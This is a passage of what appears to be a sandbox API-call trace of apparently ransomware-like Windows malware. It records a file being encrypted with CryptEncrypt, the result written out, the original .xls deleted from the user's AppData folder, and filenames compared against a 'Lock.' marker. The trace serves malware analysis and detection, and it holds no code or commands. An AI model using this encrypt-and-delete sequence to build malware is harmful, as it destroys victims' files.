hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0150.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0150.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0150.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0150.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0150.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0150.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0150.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0150.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0150.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0150.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0150.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0150.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0150.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0150.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0150.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0150.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0150.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0150.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0150.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0150.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0150.893] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0150.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0150.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0150.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0150.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0150.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0150.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0150.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0150.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0150.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0150.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0150.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0150.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0150.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0150.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0150.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa378, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0150.894] CryptEncrypt (in: hKey=0x9e1db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xfbac, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xfbb0) returned 1 [0150.894] CharLowerBuffW (in: lpsz="byte[64432]", cchLength=0xb | out: lpsz="byte[64432]") returned 0xb [0150.895] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.895] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.895] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0150.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa498, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0150.895] CryptEncrypt (in: hKey=0x9e1db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xfbac, dwBufLen=0xfbb0 | out: pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xfbb0) returned 1 [0150.898] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0150.898] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0150.898] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0150.898] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0150.898] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0150.898] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0150.904] WriteFile (in: hFile=0x4f0, lpBuffer=0x2aaf410*, nNumberOfBytesToWrite=0xfbb0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aaf410*, lpNumberOfBytesWritten=0x8cf5e4*=0xfbb0, lpOverlapped=0x0) returned 1 [0150.942] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0150.942] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0150.942] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.942] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.942] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0150.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa420, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0150.942] CryptDestroyKey (hKey=0x9e1db8) returned 1 [0150.942] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0150.942] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0150.942] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0150.942] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0150.953] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0150.953] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0150.953] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0150.953] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0150.953] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0150.953] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0150.953] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0150.953] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0150.953] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.953] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.953] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0150.953] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0150.953] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0150.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6fe0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0150.954] CryptReleaseContext (hProv=0x9beef0, dwFlags=0x0) returned 1 [0150.954] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.954] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.954] FreeLibrary (hLibModule=0x76390000) returned 1 [0150.954] CloseHandle (hObject=0x4b0) returned 1 [0150.956] CloseHandle (hObject=0x4f0) returned 1 [0150.960] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0150.960] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0150.960] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/sn-hlisepFoxRII.xls", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\sn-hlisepFoxRII.xls", lpFilePart=0x8cedf4*="sn-hlisepFoxRII.xls") returned 0x33 [0150.960] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\sn-hlisepFoxRII.xls" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sn-hlisepfoxrii.xls")) returned 0x20 [0150.961] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\sn-hlisepFoxRII.xls", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d140e20, ftCreationTime.dwHighDateTime=0x1d5d394, ftLastAccessTime.dwLowDateTime=0xa6c241d0, ftLastAccessTime.dwHighDateTime=0x1d5ce4d, ftLastWriteTime.dwLowDateTime=0xa6c241d0, ftLastWriteTime.dwHighDateTime=0x1d5ce4d, nFileSizeHigh=0x0, nFileSizeLow=0xfbac, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="sn-hlisepFoxRII.xls", cAlternateFileName="SN-HLI~1.XLS")) returned 0x9e21f8 [0150.961] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\sn-hlisepFoxRII.xls" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sn-hlisepfoxrii.xls")) returned 1 [0150.966] FindNextFileW (in: hFindFile=0x9e21f8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d140e20, ftCreationTime.dwHighDateTime=0x1d5d394, ftLastAccessTime.dwLowDateTime=0xa6c241d0, ftLastAccessTime.dwHighDateTime=0x1d5ce4d, ftLastWriteTime.dwLowDateTime=0xa6c241d0, ftLastWriteTime.dwHighDateTime=0x1d5ce4d, nFileSizeHigh=0x0, nFileSizeLow=0xfbac, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="sn-hlisepFoxRII.xls", cAlternateFileName="SN-HLI~1.XLS")) returned 0 [0150.966] FindClose (in: hFindFile=0x9e21f8 | out: hFindFile=0x9e21f8) returned 1 [0150.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0150.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0150.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0150.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0150.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0150.967] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0150.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0150.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0150.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0150.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0150.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0150.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0150.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0150.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0150.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0150.968] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0150.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0150.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0150.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0150.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0150.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0150.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0150.968] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0150.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0150.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0150.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0150.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0150.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0150.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0150.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0150.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0150.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0150.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0150.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0150.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0150.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0150.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0150.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0150.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0150.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0150.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0150.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0150.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0150.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0150.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0150.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0150.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0150.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0150.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0150.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0150.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0150.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0150.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0150.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0150.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0150.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0150.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0150.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0150.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0150.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x68) returned 0x2a68440 [0150.969] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/sn-hlisepFoxRII.xls", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\sn-hlisepFoxRII.xls", lpFilePart=0x8cf650*="sn-hlisepFoxRII.xls") returned 0x33 [0150.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0150.969] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\sn-hlisepFoxRII.xls" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sn-hlisepfoxrii.xls")) returned 0xffffffff [0150.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0150.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0150.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0150.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0150.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0150.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0150.969] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0150.969] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.970] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0150.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0150.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0150.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0150.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0150.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0150.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0150.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0150.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0150.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0150.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0150.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0150.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0150.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SROlf 2S5m.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0150.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ROlf 2S5m.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0150.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Olf 2S5m.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0150.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lf 2S5m.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0150.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f 2S5m.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0150.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 2S5m.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0150.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2S5m.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0150.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S5m.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0150.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5m.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0150.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0150.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0150.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0150.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0150.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0150.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0150.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0150.971] 